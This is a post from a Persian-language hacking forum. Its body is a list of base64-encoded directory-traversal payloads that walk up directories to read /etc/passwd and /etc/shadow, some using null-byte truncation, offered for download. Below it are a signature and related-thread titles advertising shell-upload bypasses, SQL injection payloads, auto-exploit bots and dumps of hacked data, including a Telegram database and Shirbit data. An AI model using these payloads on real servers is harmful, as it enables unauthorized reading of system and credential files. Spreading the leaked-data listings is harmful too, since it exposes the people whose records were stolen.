Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==امضای کاربر : اشرار پایدار

Ali Mrd

Twitter : twitter.com/Mokh4lef

AshRaR.Info

shahinnajafi.ashrar.info
چهارشنبه 05 آذر 1399 - 00:35
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
ارسال پاسخبرای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.


پرش به انجمن :


تماس با ما | دانلود مسیرهای باگ و فایلهای سرور در سایتها | بازگشت به بالا | پیوند سایتی RSS
تاپیک های مرتبط
موضوع تاریخ تعداد پاسخ آخرین ارسال بازدید
دانلود RapidScan اسکنر اسیب پذیری های وب ... جمعه 12 دی 1399 - 19:12 1 eblisshar 87
اگر درسایت شل اپلوذ کردید بانتی دریافت کنید / بایپ ... جمعه 12 دی 1399 - 7:56 1 eblisshar 132
دانلود فریم‌ورک Maryam جمعه 12 دی 1399 - 3:16 1 eblisshar 114
مرجع کامل وایرلس هکینگ در اینترنت ... جمعه 12 دی 1399 - 1:08 72 armanshr 7614
Shirbit اسرائیل هک شد - دانلود دیتا ... پنجشنبه 13 آذر 1399 - 6:28 0 eblisshar 135
دانلود بایپس های SQL و پیلود های مهم هک دیتابیس ... چهارشنبه 05 آذر 1399 - 0:40 0 demon 175
دانلود مسیرهای باگ و فایلهای سرور در سایتها ... چهارشنبه 05 آذر 1399 - 0:35 0 demon 141
دانلود ابرازهای بایپس سرور و اپلود شل ... چهارشنبه 05 آذر 1399 - 0:29 0 demon 152
دانلود بات های Auto Exploiter پنجشنبه 22 آبان 1399 - 12:18 0 eblisshar 187
برترین سایت های هک و امنیت در جهان ... یکشنبه 27 مهر 1399 - 10:45 48 nima_shar 5395
انواع بایپس های باگ XSS سه شنبه 22 مهر 1399 - 1:10 16 eblisshar 2886
اطلاعات هک شده از آژانس امنیت ملی امریکا (NSA) ... دوشنبه 27 مرداد 1399 - 19:32 0 eblisshar 621
ابزار انلاین برای هک و کرک و... ... یکشنبه 15 تیر 1399 - 23:38 1 1234 883
اتحاد اشرار و هکران اندونزی پنجشنبه 25 اردیبهشت 1399 - 21:51 0 eblisshar 919
سایتهای بریتانیا با اسیب پذیری SQLi ... جمعه 05 اردیبهشت 1399 - 11:59 1 arch 1028
telegram 40m db جمعه 15 فروردین 1399 - 22:24 0 eblisshar 1029
موشکافی وب هکینگ مهمترین آسیب پذیري هاي برنامه هاي ... جمعه 08 فروردین 1399 - 22:28 14 arash-shar 1899
معرفی تمام ابزارهای هک SQL Injection ... شنبه 17 اسفند 1398 - 8:37 2 darkshadow 1018
ابزار SiteBroker جمع اوری اطلاعات ... یکشنبه 26 اسفند 1397 - 15:50 2 mamba 1023
tamper های تمام دیتابیس های در sqlmap ... یکشنبه 26 اسفند 1397 - 12:40 2 mamba 878